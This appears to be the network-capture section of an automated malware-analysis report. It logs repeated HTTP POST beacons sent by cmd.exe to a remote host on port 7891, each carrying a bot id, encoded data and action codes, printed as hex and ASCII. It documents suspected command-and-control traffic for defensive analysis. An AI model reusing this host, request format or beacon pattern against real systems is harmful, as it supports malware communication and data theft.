38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
                                                        Jul 26, 2023 14:02:05.380939960 CEST54INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:05 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        12192.168.2.44972680.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:09.450376987 CEST56OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Jul 26, 2023 14:02:09.488392115 CEST56INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 4
                                                        Date: Wed, 26 Jul 2023 12:02:09 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        13192.168.2.44972780.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:09.559622049 CEST57OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 520
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
                                                        Jul 26, 2023 14:02:09.599529982 CEST57INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:09 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        14192.168.2.44973180.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:14.224826097 CEST60OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Jul 26, 2023 14:02:14.259831905 CEST60INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 4
                                                        Date: Wed, 26 Jul 2023 12:02:14 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        15192.168.2.44973280.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:14.358042002 CEST61OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 520
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
                                                        Jul 26, 2023 14:02:14.394020081 CEST61INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:14 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        16192.168.2.44973680.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:18.455609083 CEST63OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Jul 26, 2023 14:02:18.490295887 CEST64INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:18 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        17192.168.2.44974180.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:22.577147961 CEST66OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Jul 26, 2023 14:02:22.611957073 CEST66INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:22 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        18192.168.2.44974580.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:27.256772041 CEST68OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 144
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZa7vrnKnbnz&act=1000
                                                        Jul 26, 2023 14:02:27.291158915 CEST68INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:27 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        19192.168.2.44974880.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:31.437777042 CEST70OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Jul 26, 2023 14:02:31.472570896 CEST71INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:31 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.44969680.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:01:10.539072990 CEST5OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 81
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 53 6c 63 45 37 36 63 45 4f 72 6c 6f 4f 6c 6e 45 52 5a 61 37 76 72 6e 51 49 46 48 77 43 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoSlcE76cEOrloOlnERZa7vrnQIFHwC&act=1000
                                                        Jul 26, 2023 14:01:10.574842930 CEST5INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 4
                                                        Date: Wed, 26 Jul 2023 12:01:10 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        20192.168.2.44974980.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:35.530431032 CEST71OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Jul 26, 2023 14:02:35.585592985 CEST72INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:35 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        21192.168.2.44975280.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:39.654381037 CEST73OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Jul 26, 2023 14:02:39.692779064 CEST73INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:39 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        22192.168.2.44975680.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:43.805619955 CEST75OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Jul 26, 2023 14:02:43.841614008 CEST75INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:43 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        23192.168.2.44975980.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:47.936861038 CEST77OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Jul 26, 2023 14:02:47.971383095 CEST77INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:47 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        24192.168.2.44976380.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:52.031584978 CEST79OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Jul 26, 2023 14:02:52.065927029 CEST79INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:52 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        25192.168.2.44976780.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:02:56.126631021 CEST81OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Jul 26, 2023 14:02:56.160953999 CEST81INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:56 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        26192.168.2.44977080.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:03:04.849220991 CEST83OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 64
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnKnbnz&act=1000
                                                        Jul 26, 2023 14:03:04.883976936 CEST83INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:03:04 GMT


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.44969780.66.88.1457891C:\Windows\SysWOW64\cmd.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 26, 2023 14:01:11.422662973 CEST6OUTPOST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 460
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 53 6c 63 45 37 36 63 45 4f 72 6c 6f 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 51 49 46 48 77 72 5a 63 6f 33 4a 63 45 59 6a 63 45 4f 72 63 6e 72 4c 44 76 25 32 42 77 44 77 45 77 6e 45 78 77 61 6e 68 6c 6e 45 52 5a 61 25 32 42 4d 4a 63 65 26 61 63 74 3d 31 30 30 31
